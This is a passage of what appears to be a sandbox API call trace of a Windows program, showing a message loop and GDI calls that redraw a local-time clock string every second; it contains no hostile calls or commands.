(hdc=0xa0100d0, rop2=13) returned 13 [0125.317] UnrealizeObject (h=0x2d10099f) returned 1 [0125.317] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0125.317] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0125.317] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0125.317] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:55 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:55 PM", lprc=0x19f5bd) returned 13 [0125.321] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0125.321] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0125.321] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0125.321] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0125.322] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0125.322] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0125.322] TranslateMessage (lpMsg=0x2347a14) returned 0 [0125.322] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0125.322] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x37, wMilliseconds=0x3f)) [0125.322] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x37, wMilliseconds=0x40)) [0125.322] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0125.331] TranslateMessage (lpMsg=0x2347a14) returned 0 [0125.331] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0125.331] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x37, wMilliseconds=0x48)) [0125.332] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x37, wMilliseconds=0x49)) [0125.332] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0125.342] TranslateMessage (lpMsg=0x2347a14) returned 0 [0125.342] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0125.343] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x37, wMilliseconds=0x54)) [0125.344] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x37, wMilliseconds=0x54)) [0125.344] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0125.362] TranslateMessage (lpMsg=0x2347a14) returned 0 [0125.362] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0125.362] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x37, wMilliseconds=0x67)) [0125.362] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x37, wMilliseconds=0x67)) [0125.362] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.126] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.126] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.126] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x363)) [0127.126] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x363)) [0127.127] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0127.127] GetDC (hWnd=0x0) returned 0xa0100d0 [0127.127] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0127.127] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0127.127] GetSysColor (nIndex=8) returned 0x0 [0127.127] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0127.127] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0127.127] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0127.127] UnrealizeObject (h=0x2d10099f) returned 1 [0127.127] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0127.127] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0127.127] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0127.127] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:56 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:56 PM", lprc=0x19f5bd) returned 13 [0127.129] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0127.129] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0127.129] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0127.129] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0127.129] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0127.129] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.129] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.129] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.129] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x366)) [0127.129] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x366)) [0127.129] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.137] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.137] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.137] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x36e)) [0127.137] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x36e)) [0127.137] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.158] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.158] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.158] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x383)) [0127.158] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x383)) [0127.158] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.182] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.182] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.182] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x39b)) [0127.182] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x39b)) [0127.182] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.190] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.190] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.190] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x3a3)) [0127.190] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x3a3)) [0127.190] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.200] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.200] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.200] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x3ad)) [0127.200] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x3ad)) [0127.200] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.221] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.221] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.221] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x3c2)) [0127.221] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x3c2)) [0127.221] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.231] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.231] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.231] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x3cc)) [0127.231] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x3cc)) [0127.231] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.252] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.252] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.252] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x3e1)) [0127.252] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x38, wMilliseconds=0x3e1)) [0127.252] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.269] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.269] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.269] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0xa)) [0127.271] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0xc)) [0127.271] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0127.271] GetDC (hWnd=0x0) returned 0xa0100d0 [0127.271] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0127.272] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0127.272] GetSysColor (nIndex=8) returned 0x0 [0127.272] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0127.272] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0127.272] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0127.272] UnrealizeObject (h=0x2d10099f) returned 1 [0127.272] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0127.272] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0127.272] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0127.272] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:57 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:57 PM", lprc=0x19f5bd) returned 13 [0127.272] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0127.272] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0127.272] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0127.273] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0127.273] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0127.273] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.278] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.278] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.278] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x13)) [0127.278] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x13)) [0127.278] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.299] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.299] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.299] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x28)) [0127.299] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x28)) [0127.299] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.568] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.568] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.568] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x136)) [0127.572] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x139)) [0127.572] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.575] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.575] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.575] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x13c)) [0127.575] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x13c)) [0127.575] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.596] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.596] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.597] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x152)) [0127.597] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x152)) [0127.597] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.606] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.606] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.606] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x15b)) [0127.606] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x15b)) [0127.623] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.623] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.623] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.623] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x16c)) [0127.624] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x16d)) [0127.624] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.739] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.739] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.739] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x1e0)) [0127.739] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x1e0)) [0127.739] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0127.952] TranslateMessage (lpMsg=0x2347a14) returned 0 [0127.952] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0127.952] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x2b5)) [0127.953] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x2b6)) [0127.953] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.242] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.242] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.242] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x3d7)) [0128.242] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x3d7)) [0128.243] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.251] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.251] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.251] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x3e0)) [0128.251] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x39, wMilliseconds=0x3e0)) [0128.251] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.262] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.262] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.262] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x3)) [0128.262] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x3)) [0128.262] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0128.262] GetDC (hWnd=0x0) returned 0xa0100d0 [0128.513] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0128.513] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0128.513] GetSysColor (nIndex=8) returned 0x0 [0128.513] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0128.513] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0128.513] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0128.513] UnrealizeObject (h=0x2d10099f) returned 1 [0128.513] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0128.513] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0128.513] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0128.513] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:58 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:58 PM", lprc=0x19f5bd) returned 13 [0128.514] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0128.514] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0128.514] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0128.514] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0128.514] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0128.514] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.514] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.514] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.514] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0xff)) [0128.514] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0xff)) [0128.514] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.534] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.534] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0128.534] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x113)) [0128.534] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x3a, wMilliseconds=0x113)) [0128.534] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0128.545] TranslateMessage (lpMsg=0x2347a14) returned 0 [0128.545] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 